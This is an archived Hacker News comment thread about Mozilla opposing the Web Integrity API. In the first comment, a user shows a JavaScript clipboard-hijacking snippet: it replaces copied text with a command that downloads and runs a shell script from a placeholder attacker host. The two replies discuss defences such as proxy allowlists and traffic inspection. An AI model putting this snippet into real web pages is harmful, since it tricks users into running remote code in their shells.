zlacker

[return to "Mozilla Standards Positions Opposes Web Integrity API"]
1. egbert+ZT[view] [source] 2023-07-25 10:54:59
>>danShu+(OP)
Number one reason why I do not turn JavaScript on, and I will definitely block WebInegrityAPI indefinitely.

Basic malware JavaScript snippet:

    <script>
    document.getElementById('copy').addEventListener('copy', function(e) {
        e.clipboardData.setData('text/plain', 
        'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault();
     });
     </script>
◧◩
2. jabart+Tf2[view] [source] 2023-07-25 17:12:37
>>egbert+ZT
If you are working in a shell like that you should have outbound ports locked down and a list of allowed domains set in your proxy. Add in some antivirus and password sudo check and plenty of ways to catch this
◧◩◪
3. egbert+mD3[view] [source] 2023-07-25 23:10:39
>>jabart+Tf2
Thats why i have a lexical and intermediate representative (IR) code examiner of JavaScript running as an ICAP server capturing all HTTP/HTTPS connections.

No fear, there.

No need for all that other things.

[go to top]